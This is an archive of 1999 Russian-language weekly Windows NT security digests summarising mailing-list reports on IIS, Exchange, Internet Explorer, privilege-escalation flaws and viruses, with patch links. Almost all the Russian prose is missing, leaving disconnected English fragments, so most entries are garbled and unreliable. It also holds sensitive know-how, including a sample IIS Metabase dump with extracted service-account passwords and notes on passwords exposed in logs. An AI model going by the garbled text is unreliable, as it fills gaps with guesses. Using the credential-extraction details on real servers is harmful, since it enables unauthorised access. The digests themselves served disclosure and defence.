http://www.microsoft.com/msdownload/NTOptionPack/iis4sites.asp?cpu=X86&
os=NTW&lang=0409&usercpu=X86&useros=NTW&userlang=0409&usertime
zone=0&userlcid=2057&userdomain=YOURDOMAINNAME&useraccount=Y
OURUSERNAME&ModName=getfile&ModFileVer=4.02.0622

8.  

Daniel Connolly <dan@euronet.nl> (ntsecurity, iss)   , 
       
   .

Compaq

www.whovision.com

www.IntegratedVisions.com

Keysoft

IOSOFT - www.iosoftware.com

TopSoft Limited - topsoft.co.uk

SAFLINK Corporation - http://www.saflink.com

Unisys

shavliktechnologies.com

9.     
 

Weld Pond <weld@L0PHT.COM> (ntbugtraq) (ntsecurity, iss) ,  
 Password Appraiser      
.        
 (http://www.l0pht.com/advisories.html).  , 
 Password Appraiser,    
http://www.quakenbush.com/L0pht.htm.


From rudnyi Sat Feb  6 14:40:46 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA11389
	for rudnyi@comp.chem.msu.su; Sat, 6 Feb 1999 14:40:45 +0300 (MSK)
Date: Sat, 6 Feb 1999 14:40:45 +0300 (MSK)
Message-Id: <199902061140.OAA11389@comp.chem.msu.su>
Subject: digest 29.1-3.2.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

23  - 3  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.      


"Reed, David" <DReed@AWD.COM> (ntbugtraq) ,   
       
  .

1)        (Ctrl+C)  
    (Lock Workstation).

2)      ,  
Ctrl+Atl+Del,     UserName   Ctrl+V.   
   .

2.  AutoStart Mac    
NT

<ruipmartins@MAIL.TELEPAC.PT> (ntbugtraq) ,   
 MacOS AutoStart   Mac- (MacVolumes)  
Windows NT Server.       
"Deldb"   .

3. FTP 

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)     
 ,   "  "  
FTP- (.     ).

http://www.microsoft.com/security/bulletins/ms99-003.asp
http://support.microsoft.com/support/kb/articles/q188/3/48.asp

4. Intel ID

  ntsecurity (cooper)   ,  Russ 
<Russ.Cooper@RC.ON.CA>     Intel 
      .

http://www.intel.com/pressroom/archive/speeches/pg012099.htm
http://support.intel.com/support/processors/pentiumiii/index.htm

 :   ,    
   Windows NT.

5. NETBIOS 

Phil Cox [mailto:pcc@LLNL.GOV] (ntsecurity, cooper)     
"NetBIOS Interface",   ,   .

"Larry Osterman (Exchange)" <larryo@EXCHANGE.MICROSOFT.COM> 
,   NetBIOS     
   NetBIOS API (  NetAPI32.DLL). 
 NetBIOS    TDI API.   
NetBIOS interface,   ,  messenger,  
.

6.   RegDACL

Frank Heyne <fh@RCS.URZ.TU-DRESDEN.DE>, http://rcswww.urz.tu-
dresden.de/~fh/ (ntsecurity, cooper)      
     .

http://www.heysoft.de/

7. RPC    Exchange

Razvan Peteanu [mailto:rpeteanu@SYMPATICO.CA] (ntsecurity, cooper) 
,       Exchange  
 RPC.

"Larry Osterman (Exchange)" <larryo@EXCHANGE.MICROSOFT.COM> 
,     Exchange    
 RPC. (Tools/Services/Microsoft 
ExchangeServer/Properties/Advanced/EncryptInformation/When Using the 
Network)

8. Internet Information Server 4 + Site Server 2

"mnemonix" <mnemonix@globalnet.co.uk>, (ntsecurity, iss) ,  
 MS Site Server 2.0    IIS4,    
,  ASP-,  -.   
         
NTInfoScan http://www.infowar.co.uk/mnemonix/ntinfoscan.htm

9.   FTP-

loose goose <drdelam@yahoo.com> (ntsecurity, iss)   

InfoWar Security Advisory #01 
(http://www.infowar.com) 
February 1st, 1999

FTP PASV "Pizza Thief" Exploit
: Jeffrey R. Gerber

 ,     FTP      
 . 

10.     
 

Marc <marc@EEYE.COM> (ntbugtraq) (ntsecurity, iss) ,   
      WS FTP Server  
  cwd ( 876 ).    
  (HKEY_LOCAL_MACHINE\SOFTWARE\Ipswitch\),  
     FTP-.

Marc <marc@EEYE.COM> (ntbugtraq)      
 SLMail.  helo, vrfy  expn    
( 900    ). Lee Thompson 
<lt@SEATTLELAB.COM> ,      SLmail 
3.2.

********************************************************
   Sunbelt (http://www.sunbelt-software.com)

   Beta 3  W2K (Windows 2000). ,  
 , ,      4  1999,  
    2000.

         
(storage management),      W2K.  
   

http://www.sunbelt-software.com/forum/w2000storage.doc

    CD- TechNet    
http://www.microsoft.com/technet/ ( ,   
).


From rudnyi Thu Feb 18 17:03:16 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA04941
	for rudnyi@comp.chem.msu.su; Thu, 18 Feb 1999 17:03:15 +0300 (MSK)
Date: Thu, 18 Feb 1999 17:03:15 +0300 (MSK)
Message-Id: <199902181403.RAA04941@comp.chem.msu.su>
Subject: digest 5-11.2.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

5 - 11  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.    

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   "Ken Pfeil" 
<Ken@nttoolbox.com> (ntsecurity, iss)      
  .

http://www.microsoft.com/security/bulletins/ms99-004.asp

   SP4       
 DOS, Windows 3.1, Windows for Workgroups, OS/2,  Mac, , 
     NT,    
 .      NT  
        .

   

http://support.microsoft.com/support/kb/articles/q214/8/40.asp

2.    GINA

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
    ,    
.         
    .

 Q214802  

<ftp://ftp.microsoft.com//bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-
postSP4/Gina-fix/Q214802.TXT>.

3.      REBOOT.INI

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    
Microsoft BackOffice 4.0   \Program Files\Microsoft BackOffice 
  REBOOT.INI,       
    SQL Executive Logon account, Exchange Services 
Account,  MTS Remote Administration Account.

   

http://www.microsoft.com/security/bulletins/ms99-005.asp

4.   

Gilbert Huang <ghuang@KRAKENCORP.COM> (ntbugtraq)  
 ,    NT.

Expression Evaluator Security Issues
http://www.allaire.com/handlers/index.cfm?ID=8727&Method=Full

Cold Fusion 4.0 Example Applications and Sample Code Exposes Servers
http://www.allaire.com/handlers/index.cfm?ID=8739&Method=Full

Microsoft Internet Information Server Exposure of Source Code with '::$DATA'
http://www.allaire.com/handlers/index.cfm?ID=8729&Method=Full

Multiple SQL Statements in Dynamic Queries
http://www.allaire.com/handlers/index.cfm?ID=8728&Method=Full

5.    TCP  W9x

Dan Kaminsky <effugas@BEST.COM> (ntbugtraq)    
 TCP  W9x,    TCP Chorusing.   
   http://doxpara.netpedia.net

6.  

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)    
  CERT    .

http://www.cert.org/advisories/CA-99-02-Trojan-Horses.html

******************************************************
   Sunbelt (http://www.sunbelt-software.com)

      W9x.  
  ,    Windows 2000    
 NT,     .


From rudnyi Sat Feb 20 17:08:17 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA02145
	for rudnyi@comp.chem.msu.su; Sat, 20 Feb 1999 17:08:16 +0300 (MSK)
Date: Sat, 20 Feb 1999 17:08:16 +0300 (MSK)
Message-Id: <199902201408.RAA02145@comp.chem.msu.su>
Subject: digest 12-18.2.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

12 - 18  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.  GetAdmin

Dildog <dildog@L0PHT.COM> (ntbugtraq)     
,     Windows NT 4.0 Server 
SP4  Windows NT 4.0 Workstation SP4    
  .    ,  Windows NT 
    ,   ,    
       Everyone.   
   -   DLL  
   .

  ,  ,    
   

http://www.l0pht.com/advisories.html

2.   NT,   


Victor.DIAS-FERNANDES@DG12.CEC.BE (ntsecurity, cooper)  
  , ,   NT,   
.

http://www.comnet.be/FreeStuff.htm

"Krzysztof Rozanski" <krzysztofr@miko.pila.pl> (ntsecurity, iss)  
 CGI,   NT   .   
   .    


http://www.miko.net.pl/Krzysiu/

3. PPTP

Vahan Amirbekyan <vahan@OSI.AM> (ntsecurity, cooper)    
,     PPTP.

http://oliver.efri.hr/~crv/security/bugs/NT/pptp2.html

4. ,   Metabase

"Patrick CHAMBET" <pchambet@club-internet.fr> (ntsecurity, iss) , 
  Metabase        . 
Metabase    Option Pack     

C:\WINNT\system32\inetsrv\MetaBase.bin

   ,     Metabase:

IIS 4.0 Metabase
 Patrick Chambet 1998 - pchambet@club-internet.fr

- --- UNC User ---
UNC User name: 'Lou'
UNC User password: 'Microsoft'
UNC Authentication Pass Through: 'False'

- --- Anonymous User ---
Anonymous User name: 'IUSR_SERVER'
Anonymous User password: 'x1fj5h_iopNNsp'
Password synchronization: 'False'

- --- IIS Logs DSN User ---
ODBC DSN name: 'HTTPLOG'
ODBC table name: 'InternetLog'
ODBC User name: 'InternetAdmin'
ODBC User password: 'xxxxxx'

- --- Web Applications User ---
WAM User name: 'IWAM_SERVER'
WAM User password: 'Aj8_g2sAhjlk2'
Default Logon Domain: ''

5.     
 

Jeffrey Monroe <jeffrey.monroe@MOBMEDIA.COM> (ntbugtraq) , 
      Seagate Backup Exec (McAfee) 
     Visual Basic 
(     
http://seer.seagatesoftware.com/).

*********************************************************
   Sunbelt (www.sunbelt-software.com)

  SMS 2.0

http://www.microsoft.com/windows/dailynews/020899.htm

,   ,  Service Pack 5  Windows NT 
4.0    .


From rudnyi Wed Mar  3 22:53:39 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id WAA10910
	for rudnyi@comp.chem.msu.su; Wed, 3 Mar 1999 22:53:39 +0300 (MSK)
Date: Wed, 3 Mar 1999 22:53:39 +0300 (MSK)
Message-Id: <199903031953.WAA10910@comp.chem.msu.su>
Subject: digest 19-25.2.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,   training.ru

   http://training.ru/security/    
 security@training.ru

  .    http://training.ru   
    .

19 - 25  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.   DLL

           DLL 
(http://www.l0pht.com/advisories.html),    
   .

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
 ,    
(http://www.microsoft.com/security/bulletins/ms99-006.asp),  
  
http://support.microsoft.com/support/kb/articles/q218/4/73.asp.  
,        NT 4.0 Resource Kit   
 "Securing Windows NT Installation" 
(http://www.microsoft.com/ntserver/security/exec/overview/Secure_NTInstall.
asp).

      ProtectionMode  
 HKLM\System\CCS\Control\Session Manager  1.

2.   IIS4 

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
   .    Web Administration 
   IIS4    "/IISADMPWD",  
   .htr (  
c:\winnt\system32\inetsrv\iisadmpwd).      
        IP .   
        
Web.     ,   
        . 
 ,       IPADDRESS\ACNAME,  
-   NETBIOS     
 ,      
       .

 -    "/IISADMPWD".

http://www.infowar.co.uk/mnemonix/

3.   msvcrt.dll

Jim Michaels <jimm@INTEGRITYONLINE.COM> (ntbugtraq) ,  
     msvcrt.dll 
(http://msdn.microsoft.com/visualc/headlines/2001.asp),   
 "April Fools 2001".

4.    cmd

"Sundaram, Aurobindo" <sundaram@AUSTIN.APC.SLB.COM> (ntbugtraq) 
 ,     .exe    
  -    . ,

move netscape.exe netscape.exe.orig
netscape.exe.orig ()
move netscape.exe.orig netscape.orig
netscape.orig ( )

,    ,     

move netscape.orig netscape
netscape ( )

    ,    .

5.     IE

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
     IE 4 -      
 javascript.       
  http://pages.whowhere.com/computers/cuartangojc

6. NetBus 2.0 Pro, Caligula,  Picture.exe

X-Force <xforce@iss.net> (ntsecurity, iss)  , 
  ,    , 
       
.     http://www.iss.net/xforce/

7.     
 

Larry West <LWest@OKLAHOMAN.COM> (ntbugtraq) ,   
  McAfee NetSheild for Windows NT (version 4.02)  
         Sytem.

mnemonix <mnemonix@GLOBALNET.CO.UK> (ntbugtraq) (ntsecurity, iss) 
,    SLMail 3.2 (and 3.1)  Remote 
Administration Service       
     NTFS.    , 
     ,     
SYSTEM.  -  Remote Administration Service.



From rudnyi Tue Mar  9 18:05:18 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id SAA05582
	for rudnyi@comp.chem.msu.su; Tue, 9 Mar 1999 18:05:17 +0300 (MSK)
Date: Tue, 9 Mar 1999 18:05:17 +0300 (MSK)
Message-Id: <199903091505.SAA05582@comp.chem.msu.su>
Subject: digest 26.2-4.3.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

26  - 4  1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1. KnownDlls

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
  SMSS-FIX  ,   
  (http://www.l0pht.com/advisories.html).

http://support.microsoft.com/support/kb/articles/q218/4/73.asp

2. Intel ID

peter riegersperger <rick@SALZBURG.CO.AT> (ntsecurity, cooper)  
  ,      
 Intel.

http://www.heise.de/ct/english/99/05/news1/

3.    

"dom" <dom@noln.com> (ntsecurity, iss) ,    
     .

"Marc" <marc@eEye.com> (ntsecurity, iss)   Nat 
(Netbios Auditing Tool).        
  

http://ftpsearch.lycos.com/cgi-
bin/search?form=lycosnet&query=nat10.tgz&filetype=All+files

David LeBlanc <dleblanc@iss.net> (ntsecurity, iss)   
  Perl

http://www.nmrc.org/faqs/nt/nt_a02.html

4.  SAMBA   NT

Paul L Schmehl <pauls@UTDALLAS.EDU> (ntbugtraq) ,   
  SAMBA   NT  .

  SAMBA    ( smb.conf)

security=server
password server=[hostname of PDC]
domain controller=[hostname of PDC]
domain logons=yes

  PDC    Samba   ,   
      . PDC  ,   
   .

5.     
 

Alexandre Viale <alexandre.viale@ESFRANCE.COM> (ntbugtraq) , 
   Netscape Messenger   Netscape Mail 
Notification      

HKCU\Software\Netcape\Netscape 
Navigator\biff\Users\<user>\Servers\<server>

   Full rights   ,    
    .

Marc <marc@EEYE.COM> (ntbugtraq) (ntsecurity, iss) ,   
IMail 5.0       ,   
 .

James Kivisild <kivisild@MAILHOST.TCS.TULANE.EDU> (ntbugtraq) 
,  Oracle 8.0.3 Enterprise Edition     
"\orant\database\spoolmain.log",        
 . ,

SVRMGR> connect INTERNAL/MYPASSWORD
Connected.

*********************************************************
   Sunbelt

      Linux

http://www.sunbelt-software.com/march99survey.htm

    TCP/IP

http://www.acm.org/crossroads/xrds1-1/tcpjmy.html


 (    )

"The Sony Vaio machines have replaced the impersonal and unhelpful
Microsoft error messages with their own Japanese haiku poetry.

- - - - - - - - - - - - - - - - - - - -

A file that big?
It might be very useful.
But now it is gone.

- - - - - - - - - - - - - - - - - - - -

The Web site you seek
Can not be located but
Countless more exist

- - - - - - - - - - - - - - - - - - - -

Chaos reigns within.
Reflect, repent, and reboot.
Order shall return.

- - - - - - - - - - - - - - - - - - - -

ABORTED effort:
Close all that you have worked on.
You ask way too much.

- - - - - - - - - - - - - - - - - - - -

Yesterday it worked
Today it is not working
Windows is like that.

- - - - - - - - - - - - - - - - - - - -

First snow, then silence.
This thousand dollar screen dies
so beautifully.

- - - - - - - - - - - - - - - - - - -

With searching comes loss
and the presence of absence:
"My Novel" not found.

- - - - - - - - - - - - - - - - - - - -

The Tao that is seen
Is not the true Tao, until
You bring fresh toner.

- - - - - - - - - - - - - - - - - - - -

Windows NT crashed.
I am the Blue Screen of Death.
No one hears your screams.

- - - - - - - - - - - - - - - - - - -

Stay the patient course
Of little worth is your ire
The network is down

- - - - - - - - - - - - - - - - - - -

A crash reduces
your expensive computer
to a simple stone.

- - - - - - - - - - - - - - - - - - - -

Three things are certain:
Death, taxes, and lost data.
Guess which has occurred.

- - - - - - - - - - - - - - - - - - - -

You step in the stream,
but the water has moved on.
This page is not here.

- - - - - - - - - - - - - - - - - - - -

Out of memory.
We wish to hold the whole sky,
But we never will.

- - - - - - - - - - - - - - - - - - - -

Having been erased,
The document you're seeking
Must now be retyped.

- - - - - - - - - - - - - - - - - - - -

Serious error.
All shortcuts have disappeared.
Screen. Mind. Both are blank.

- - - - - - - - - - - - - - - - - - - -



From rudnyi Mon Mar 15 17:02:53 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id RAA17589
	for rudnyi@comp.chem.msu.su; Mon, 15 Mar 1999 17:02:52 +0300 (MSK)
Date: Mon, 15 Mar 1999 17:02:52 +0300 (MSK)
Message-Id: <199903151402.RAA17589@comp.chem.msu.su>
Subject: digest 5-11.3.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

5.03 - 11.03.1999 

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.    
 

security@NTSECURITY.NET       
 ,  Prasad Dabak ( sechole.exe).

     WINLOGON.EXE,  
   ,      
   . ,   ,  
 NT 3.51  NT 4.0 SP1.      SP1,   
 .

        

http://www.ntshop.net/scripts/load.asp?iD=/security/screensaver1.htm

   Prasad Dabak ,    
  Write     NT \??.   
   ,    ,  
 ,    " ".

        

http://www.ntsecurity.net/scripts/load.asp?iD=/security/casesensitive.htm

2.  ISAPI

Fabien Royer <fabienr@BELLATLANTIC.NET> (ntbugtraq)  
    ISAPI.      
  ISAPI,    GetExtensionVersion() 
       SYSTEM.  
  ,     
    ISAPI.

3. Winfreeze

Paul Gregoire <paul@HELLONETWORK.COM> (ntbugtraq)   
,    ICMP/Redirect    
   W9x  NT (  "  
").     ICMP/Redirect  
 IP ,  IP- .

4. SP5

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)      -
 SP5  NT4.

http://www.news.com/News/Item/0,4,33607,00.html

5.      


"Michael, James" <james.michael@EDS.COM> (ntbugtraq) ,  
         ,  
   .

,    1:59:55am     
(daylight savings date).  NT   1:00am.  
.      1   2:00am.

6. MD5

"Bongiovanni, Sharon" <Sharon.Bongiovanni@PHH.COM> (ntsecurity, 
cooper) ,      MD5   
 NT.

Paul Stauffer <paulds@BU.EDU>   Perl.

http://www.activestate.com/packages/zips/MD5.zip

7.   

Jim Rohacik <jjrohac@ILSTU.EDU> (ntsecurity, cooper) ,  
      800    
     .

Jim Rohacik <jjrohac@ILSTU.EDU>  Addusers.exe  NT 
Resource Kit.

"Jesper M. Johansson" <jesper.m.johansson-1@UMN.EDU>  
   NET USER  NET GROUP.

Patrick CHAMBET <pchambet@CLUB-INTERNET.FR>  
    ADSI (Active Directory Server 
Interface).

,

    ' Get the domain
    Set gDomain = GetObject("WinNT://DOMAIN")

    ' Add a new User to the Domain
    Set NewUser = gDomain.Create("User", gName)

    ' Set the properties of the user
    NewUser.FullName = gFullName
    NewUser.Description = gLDescription
    NewUser.AccountDisabled = FALSE
    NewUser.PasswordExpirationDate = CDate("12/12/1999")
    ' Write to the DS
    Call NewUser.SetInfo()

    ' Set the Password
    Call NewUser.SetPassword(gPassword)   'Or: .ChangePassword if user
already exists

8. SCM

Francis Favorini <francis.favorini@DUKE.EDU> (ntsecurity, cooper) , 
        , 
   Security Configuration Editor.

Jesper M. Johansson" <jesper.m.johansson-1@UMN.EDU>  
  NTSEC

http://www.pedestalsoftware.com/ntsec/index.htm.

9.     
 

Fabien Royer <fabienr@BELLATLANTIC.NET> (ntbugtraq) ,  
 TestTrack, (http://www.seapine.com)      
 ; 1)     , 2) 
  "  ".

Lee Thompson <lt@SEATTLELAB.COM> (ntbugtraq)   
    Slmail (http://www.seattlelab.com).

***************************************************
   Sunbelt (http://www.sunbelt-software.com)

         
   Windows NT:

STAT V2.0 - http://www.sunbelt-software.com/stat.htm

   NT    

http://www.sunbelt-software.com/statdetects.htm

    -    Linux.

,   2000 .
http://www.sunbelt-software.com/0399_2000.htm

1) 40%     .

2) 68%    1  10 NT Servers
   13% - 11-20 NT Servers
   8% -  21  50 NT Servers

3) 59%   1-100  
   14% - 100-250 WS
   9%  - 250-500

4) 40%   OUTLOOK

5) 80%        HTML 

6) 67%    Linux     
.
   20%  
   12%    Linux 

7)    Linux?
    - WebServer,  - EmailServer,  - Desktop, - 
File/print.
   
8)   ? STABILITY AND PERFORMANCE.

9)   Linux  ?
   42%    1-5 Linux servers
   9.5% -   6  10 

10)   NT  ?
    31%    1-5 Linux servers 
    7.6% -   6  10  



From rudnyi Tue Mar 23 10:13:56 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA03782
	for rudnyi@comp.chem.msu.su; Tue, 23 Mar 1999 10:13:55 +0300 (MSK)
Date: Tue, 23 Mar 1999 10:13:55 +0300 (MSK)
Message-Id: <199903230713.KAA03782@comp.chem.msu.su>
Subject: digest 12-18.3.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

12 - 18.03.1999 

   training.ru. 

   VUE:   Microsoft, 
Novell, Sybase.       
,    .    
  vue@training.ru.

        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1.   

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,   
       winlogon,  
     Cybermedia Software Private 
Limited

http://www.cybermedia.co.in/NT_Security/SS_vulnerability.htm

http://www.microsoft.com/security/bulletins/ms99-008.asp

     Knowledge Base

http://support.microsoft.com/support/kb/articles/q221/9/91.asp

2. MD5

     Bongiovanni, Sharon 
[SMTP:Sharon.Bongiovanni@PHH.COM],     
    .

David LeBlanc <dleblanc@MINDSPRING.COM> (ntsecurity, cooper) 
   MapFileAndCheckSum().  
Dumpbin (   SDK  VC++)   
 .

Lehmann Dirk <Dirk.Lehmann@MCHP.SIEMENS.DE> (ntsecurity, cooper) 
   SumIt

http://members.tripod.de/DirkLehmann/

oisin@LABYRINTH.IE (ntsecurity, cooper)   
 md5sum.exe,     PGP

http://www.pgpi.com

3.   

"Reimers, Dirk" <Reimers@secunet.de> (ntsecurity, iss)   
 SecLan,    .   
  -     , 
       
 ,   56- DES,  128- DES.

4. FileSystemObject

C Mcnichols <cmcnicho@runet.edu> (ntsecurity, iss)   
   FileSystemObject,    IIS 4.  
         ASP-
.     ,    
    -,  
,    ASP-,   
FileSystemObject     ,    
. ,    NTFS   
. ,    .

       ASP,  
     (,  
    ).      
 Script  IIS 4.0,     NTFS    
 Read   .  ,    
      ASP,    
 FileSystemObject      
     .

  -   FileSystemObject.

5.     

"John D. Hardin" <jhardin@wolfenet.com> (ntsecurity, iss)    
 ,      
,  -   

http://www.wolfenet.com/~jhardin/procmail-security.html

6.    Exchange 5.5

 X-Force <xforce@iss.net> (ntsecurity, iss)  , 
   Exchange's LDAP (Lightweight 
Directory Access Protocol) .    
        
 .

  ,   

http://www.microsoft.com/security/bulletins/ms99-009.asp

7.  5000  5001

Bob (ntsecurity, iss) ,       5000  
5001.   -   ?

"Christopher Budd" <cbudd@pilot.net>  

http://www.isi.edu/in-notes/iana/assignments/port-numbers

commplex-main	5000/tcp
commplex-main	5000/udp
commplex-link	5001/tcp

"Espinola, Mike" <Mike.Espinola@EastmanSoftware.com> (ntsecurity, iss) 
,    " " "Sockets de Trois" 
  5000,5001,30303,50505.

*****************************************************
   Sunbelt (http://www.sunbelt-software.com)

10      W2K

http://www.mcpmag.com/members/current/fea3main.asp

Wall Street Journal ,     
.       


CUSTOMER          MAIN PRODUCTS          HEADED BY
--------------------------------------------------------------------
Corporate         Windows Operating      Jim Allchin, now senior VP
Enterprise,       Systems: 95/98/W2K     personal & business systems 
Chief Inform.
Officer		
---------------------------------------------------------------------
Knowledge         Office and BackOffice  Bob Muglia, now senior VP
Workers                                  Applications and Tools
---------------------------------------------------------------------
Software          Development Tools      Paul Maritz, now group VP
programmers                              platforms and applications
---------------------------------------------------------------------
Consumers         MS Network, enter-     Jon DeVaan, at the moment
                  tainment Software      VP desktop applications and
                                         Brad Chase, VP developer
                                         relations and marketing
---------------------------------------------------------------------

 ,      Windows NT 
Workstation  28 .



From rudnyi Tue Mar 30 14:06:20 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id OAA13675
	for rudnyi@comp.chem.msu.su; Tue, 30 Mar 1999 14:06:18 +0400 (MSD)
Date: Tue, 30 Mar 1999 14:06:18 +0400 (MSD)
Message-Id: <199903301006.OAA13675@comp.chem.msu.su>
Subject: digest 19-25.3.99
From: security@training.ru
MIME-Version: 1.0
Content-Type: text/plain; charset=KOI8-R
Reply-To: security@training.ru
Status: RO

   Windows NT

() 1999,   ,    

   http://www.training.ru/security/    
 security@training.ru

19 - 25  1999 

  -.

   !

19  20  1999 .  "-", 
       Xerox 
        , 
    " -99".   
: ,  .      
!

    - 
www.e-office.ru


        
ntbugtraq, ntsecurity (Cooper), ntsecurity (iss)  ntsecurity (wwa) ( 
  - http://www.training.ru/security/).

1. Internet Explorer 5

 IE5,      .

Thor Kottelin <tkottelin@TERRANOVA.FI> (ntbugtraq) ,  
  IE5      
    (Screen Saver).

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq)   

  IE5  VDOLive  Microsoft Music Control.
       
IE.
   Outlook Express.
   ,    
.

Dimitry Andric <dim@xs4all.nl> (ntbugtraq) ,   
 IE5    Task Scheduler Service.

"Claudio Valderrama C." <cvalde@USA.NET> (ntbugtraq) ,  IE5 
    (cookies)     "Accept 
always",     .   
   "Prompt before accepting",   
  ,     (, 
www.celebsite.com),       ,  IE5 . 
Mark <mark@NTSHOP.NET> ,       
 ,  IE5 ,      
   . , Mark     IE5  
  .

 "Claudio Valderrama C." <cvalde@USA.NET> ,  IE5  
  "COM+ Event System",     
.

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
  IE5     .  
,  IE5 c    "Allow paste operations via 
script"  "Enable",   ,  IE4.  
     .

Harry Goodwin <harryg@MICROSOFT.COM> ,   
IE5     "Allow paste operations via script" 
 "Disable".       
 IEAK.

Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> (ntbugtraq) 
 ,    IE5    Active X 
"DHTML Edit control Safe for Scripting for IE 5",     
 -          
   .     

http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html

  ,   IE5   CSLID,  
(clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A)   
CODEBASE,         
.

Harry Goodwin <harryg@MICROSOFT.COM> ,   
.   
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\InternetSettings\CodeBaseSearchPath

  URL  IE   ,    
  CODEBASE.

  Phil Brass <pbrass@ISS.NET>   ,    
  ,      .

2. Outlook Express 5.0

Russ <Russ.Cooper@RC.ON.CA> (ntbugtraq) ,    OE 5.0 
       
 S/MIME -   .

3.   

Brett Robins <brett@BALISOFT.COM> (ntbugtraq)    
,        
    ,     
     (   OK  
Apply).         . 
      PDC,   ,   
     ( ,    OK  
Apply),        . 
       ,      
  .

Paul Donnelly <pauldon@MICROSOFT.COM> ,   
    Windows 2000.

4.   Y2K

Ilya Slavin <Ilya.Slavin@TUDOR.COM> (ntbugtraq)    
,   2000     NT c  SP4. 
        1999 , 
 NT       , 
   .

Jason Garms <jasong@MICROSOFT.COM> ,     
    .

Andrew Kunz <skipper@HOMEON.ZA.NET> (ntbugtraq) ,  
  Java,   SP4 CD,   
 Y2K.

http://www.microsoft.com/technet/year2k/product/user_view67961EN.htm

5. Index Server 2.0

Mnemonix <mnemonix@GLOBALNET.CO.UK>, 
http://www.infowar.co.uk/mnemonix/, (ntbugtraq) ,   
 Index Server 2.0   IIS4,   

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg

   

HKLM\System\CurrentControlset\Control\ContentIndex\Catalogs

 ,  ,     , 
 ,    -.

6. SiteServer(SS) 3.0 Direct Mail(DM)

The Hidden <the_hidden_1@YAHOO.COM> (ntbugtraq) ,   
   DM  SS,      
\\Machine\TMLBQueue\Schedule\,         
.

7. Melissa Macro Virus

Aaron Wood <awood@CS.WASHINGTON.EDU> (ntbugtraq) ,  
  Word,    . 
     

http://vil.mcafee.com/vil/vm10120.asp

http://www.infoworld.com/cgi-bin/displayStory.pl?990326.wcvirus.htm

        
 Trend Micro Inc.'s

http://www.antivirus.com/vinfo/alerts.htm

8.     
 

Ken - Packet Storm <tattooman@ADRIC.GENOCIDE2600.COM> (ntbugtraq) 
   aeon@army.net,   ,   
ProMail v1.21       
 ,    ,   
 .       
http://cool.icestorm.net/aeon/news.html.



From rudnyi Wed Apr  7 10:18:15 1999
Received: (from rudnyi@localhost)
	by comp.chem.msu.su (8.9.1/8.9.1) id KAA06548
